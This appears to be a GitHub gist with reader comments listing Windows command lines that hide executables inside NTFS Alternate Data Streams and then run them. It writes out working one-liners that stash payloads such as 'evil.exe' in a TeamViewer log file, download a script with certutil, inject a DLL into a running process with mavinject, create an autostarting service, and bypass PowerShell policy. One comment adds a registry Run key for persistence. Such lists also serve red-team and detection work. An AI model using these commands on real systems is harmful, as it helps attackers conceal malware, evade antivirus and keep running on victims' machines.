Execute from Alternate Streams
#Add content to ADS | |
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe" | |
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe | |
findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe | |
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt | |
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab | |
print /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exe | |
reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg | |
regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey | |
expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat | |
esentutl.exe /y C:\ADS\autoruns.exe /d c:\ADS\file.txt:autoruns.exe /o | |
powershell -command " & {(Get-Content C:\ADS\file.exe -Raw | Set-Content C:\ADS\file.txt -Stream file.exe)}" | |
curl file://c:/temp/autoruns.exe --output c:\temp\textfile1.txt:auto.exe | |
#Executing the ADS content | |
* WMIC | |
wmic process call create '"C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"' | |
* Rundll32 | |
rundll32 "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:ADSDLL.dll",DllMain | |
rundll32.exe advpack.dll,RegisterOCX not_a_dll.txt:test.dll | |
rundll32.exe ieadvpack.dll,RegisterOCX not_a_dll.txt:test.dll | |
* Cscript | |
cscript "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Script.vbs" | |
* Wscript | |
wscript c:\ads\file.txt:script.vbs | |
* Forfiles | |
forfiles /p c:\windows\system32 /m notepad.exe /c "c:\temp\shellloader.dll:bginfo.exe" | |
* Mavinject.exe | |
c:\windows\SysWOW64\notepad.exe | |
tasklist | findstr notepad | |
notepad.exe 4172 31C5CE94259D4006 2 18,476 K | |
type c:\temp\AtomicTest.dll > "c:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Atomic.dll" | |
c:\windows\WinSxS\wow64_microsoft-windows-appmanagement-appvwow_31bf3856ad364e35_10.0.16299.15_none_e07aa28c97ebfa48\mavinject.exe 4172 /INJECTRUNNING "c:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Atomic.dll" | |
* MSHTA | |
mshta "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:helloworld.hta" | |
* Control.exe | |
control.exe c:\windows\tasks\zzz:notepad_reflective_x64.dll | |
https://twitter.com/bohops/status/954466315913310209 | |
* Create service and run | |
sc create evilservice binPath= "\"c:\ADS\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto | |
sc start evilservice | |
https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ | |
* Powershell.exe | |
powershell -ep bypass - < c:\temp:ttt | |
* Powershell.exe | |
powershell -command " & {(Get-Content C:\ADS\1.txt -Stream file.exe -Raw | Set-Content c:\ADS\file.exe) | start-process c:\ADS\file.exe}" | |
* Powershell.exe | |
Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = C:\ads\folder:file.exe} | |
* Regedit.exe | |
regedit c:\ads\file.txt:regfile.reg | |
* Bitsadmin.exe | |
bitsadmin /create myfile | |
bitsadmin /addfile myfile c:\windows\system32\notepad.exe c:\data\playfolder\notepad.exe | |
bitsadmin /SetNotifyCmdLine myfile c:\ADS\1.txt:cmd.exe NULL | |
bitsadmin /RESUME myfile | |
* AppVLP.exe | |
AppVLP.exe c:\windows\tracing\test.txt:ha.exe |
This comment has been minimized.
This comment has been minimized.
Thanks. Good to hear. |
This comment has been minimized.
This comment has been minimized.
sparta34
commented
Apr 13, 2018
good job , but when the victim reboot , where is the persistence mechanism here , can you make a small demo for this please, thanks a lot |
This comment has been minimized.
This comment has been minimized.
Hi. This is not persistence mechanisms. This is only ways of hiding programs withing ADS and ways of executing it. How to place your persistence is up to you. For instance a RUN key in registry could launch the WMIC command that execute data from an Alternate Data stream. |
This comment has been minimized.
This comment has been minimized.
webs3c
commented
Apr 27, 2018
"powershell Start-Process -FilePath xx.exe" can execute the file too~ |
This comment has been minimized.
This comment has been minimized.
jmaravi
commented
Jun 17, 2018
Will AV detect the malicious payload? |
This comment has been minimized.
This comment has been minimized.
curi0usJack
commented
Jan 22, 2019
@jmaravi - yes. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
This comment has been minimized.
D4Vinci commentedApr 12, 2018
•
edited
Great work man ,this helps a lot😄